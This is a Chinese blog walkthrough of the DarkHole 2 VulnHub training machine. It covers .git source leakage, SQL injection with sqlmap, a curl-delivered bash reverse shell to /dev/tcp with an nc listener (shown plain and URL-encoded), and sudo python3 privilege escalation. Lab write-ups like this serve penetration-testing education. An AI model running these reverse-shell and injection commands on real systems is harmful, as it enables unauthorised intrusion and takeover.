DarkHole 2靶场详细教学

最新推荐文章于 2024-04-14 01:04:27 发布
最新推荐文章于 2024-04-14 01:04:27 发布
阅读量402 收藏 1
点赞数 1
分类专栏: 网络安全 Vulnhub百个项目渗透 文章标签: web安全 网络安全 git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60374959/article/details/127985393
版权

目录

信息收集

0x01 主机发现

0x02 端口扫描

0x03 访问地址

0x04下载源代码分析工具进行源码分析

0x05 登入后台

漏洞利用

0x06 sql注入

权限提升

0x07 内网信息收集

0x08 反弹shell

0x09 提权

总结

信息收集

0x01 主机发现

arp-scan -l

0x02 端口扫描

发现文件目录/.git

nmap -p- -A -T5 -sV 129.168.113.139

0x03 访问地址

访问192.168.113.139,发现后台,访问目录。

0x04下载源代码分析工具进行源码分析

git clone https://github.com/lijiejie/GitHack.git                --下载工具
cd GitHack.git                                                   --进入文件
python GitHack.py http://192.168.113.139/.git/                   --运行py文件
tree                                                             --树状结构

​对源码进行分析,发现并无什么有用信息,在/config/config.php中发现mysql数据库的root账号密码:root:darkhole_2

下载另一个工具

 git clone https://github.com/arthaud/git-dumper.git             --工具下载
 cd git-dumper                                                   --进入文件夹
 python git_dumper.py http://192.168.56.147/.git/ website        --运行程序
 cd website
 git log                                                         --查看log纪录
 git --help                                                 
 git diff a4d900a8d85e8938d3601f3cef113ee293028e10               --查看两次的差异性
 得到邮箱:lush@admin.com      密码:321
运行脚本的时候可能会出现报错的情况,下载一个包就好了
pip install -r requirements.txt                                  --下载一个包

0x05 登入后台

登入后发现URL存在id=1这种字眼,尝试sql注入。

漏洞利用

0x06 sql注入

分别尝试
http://192.168.113.139/dashboard.php?id=1'                            --报错
http://192.168.113.139/dashboard.php?id=1’and1=1--+                   --正常访问

尝试使用sqlmap去爆破

sqlmap -u http://192.168.113.139/dashboard.php?id=1 --cookie='PHPSESSID=hjm9ub21ovlbrus9rkgjn6n5r5' --dump                 --使用cookie爆破
​
发现ssh的账号密码
user:jehad
pass:fool

使用ssh连接,发现是一个普通用户权限

权限提升

0x07 内网信息收集

ls  -al
cat .bash_history

查看历史记录是发现本地端口9999存在命令执行漏洞,尝试执行之后,发现可以执行成功,并且发现这个漏洞的账号用户是losy

0x08 反弹shell

curl "http://127.0.0.1:9999/?cmd=bash -c 'exec bash -i &>/dev/tcp/192.168.113.128/7777 <&1'"
​
curl "http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%31%33%2e%31%32%38%2f%37%37%37%37%20%3c%26%31%27"   
                                                   --因为是curl执行,所以需要url编码
                                                   
nc -vlp 7777                                       --kali监听

cd /home/losy
ls -al                                                       --查看文件
cat .bash_history                                            --查看操作历史
发现losy的密码:gang

0x09 提权

ssh登入losy账号

使用sudo -l查看提权条件
使用python3提权
sudo /usr/bin/python3 -c 'import os;os.execl("/bin/bash")'

总结

本次靶场所运用到的知识点

1.源码分析(.git信息泄露)

2.sql注入

3.sudo提权(.bash_histroy历史命令提权)

心"元"意“码”
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA的靶场安装教学
06-08
DVWA的靶场安装教学
DarkHole2 vulnhub靶场
weixin_62621015的博客
03-16 174
DarkHole2 vulnhub靶场个人通关笔记 不是很难
DarkHole_2靶场
zjxxxy的博客
06-14 158
vulnhub靶场DarkHole_2攻略
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)(1),2024互联网大厂网络安全面经合集
最新发布
2301_77116622的博客
04-14 818
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.两款工具达成的效果是一致的,大家自行选择喜欢的工具即可。
darkhole2
qq_62144749的博客
09-02 421
vulnhub darkhole2
靶机:darkhole_2
weixin_50339323的博客
09-09 1339
一、信息搜集 1. 获取IP nmap -sP 192.168.8.0/24 获取的IP:192.168.8.139 2. 扫描IP端口服务 nmap -sC -sV 192.168.8.139 3.目录探测: gobuster dir -q -u http://192.168.8.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt 二、漏洞挖掘 1. 进入到网页 访问 192.168.8.139...
【Vulnhub靶场DARKHOLE: 2
DG_s1mple
03-23 1517
环境准备 下载靶机导入到vmware 攻击机IP为:192.168.2.18 靶机的IP为:192.168.2.16 信息收集 我们首先使用nmap扫描一下靶机开放的端口信息 发现只开放了ssh跟http服务,我们首先访问一下他的网站 有一个登录界面,其他并无什么有用信息 渗透开始 网站页面没有什么有用信息,我们扫描一下网站的目录 有.git泄露,我们使用工具把它下载下来 看看git的日志 发现有修改过login.php文件,我们回到这次缓存 获得网站后台的账号密码,我们去登录一下 发现这里
海贼王等靶场详细解题步骤资料
08-30
网络安全靶场题目:海贼王等靶场详细解题步骤资料,一步步讲解,一步步演示,拥有靶场,赠送福利。
一个简单的web靶场2.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
log4j2-rce靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3003
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 908
vulnhub靶场 DarkHole: 2,难度:困难级别
DARKHOLE 2
Czheisenberg的博客
02-18 600
vulnhub靶场——DarkHole 2 WriteUp
看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2
Aluxian_的博客
05-31 858
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度适中。
DARKHOLE: 2
weixin_45042115的博客
10-05 1871
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 199
DarkHole2
vulnhub之darkhole_2
weixin_54431413的博客
07-04 472
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录权限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平提权到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo提权...
DarkHole2渗透测试
weixin_43769253的博客
07-29 429
vulnhub靶机DarkHole2渗透记录 难度:高
darkhole1靶场渗透通关
tpaer的博客
10-02 854
记录下靶场实战的通关过程。主要通关流程是利用web页面的逻辑漏洞进行越权,再绕过文件上传黑名单上传木马getshell,最后通过本地环境变量进行提权。只是一种思路,也可以用一些其他通杀漏洞(CVE-2021-4034)来打。
pikachu靶场详细
10-20
Pikachu靶场是一款专门用于网络安全学习和演练的开源靶场系统。它包含了多种不同类型的漏洞,例如SQL注入、XSS、CSRF等,可以帮助安全从业人员和安全爱好者更好地学习和实践网络安全知识。Pikachu靶场的代码托管在GitHub上,用户可以自由下载和使用。 Pikachu靶场的使用方法比较简单,用户只需要下载代码并部署到自己的服务器上即可。靶场中包含了多个不同的漏洞场景,用户可以根据自己的需要选择相应的场景进行学习和实践。此外,Pikachu靶场还提供了详细的漏洞解释和修复建议,帮助用户更好地理解和掌握网络安全知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值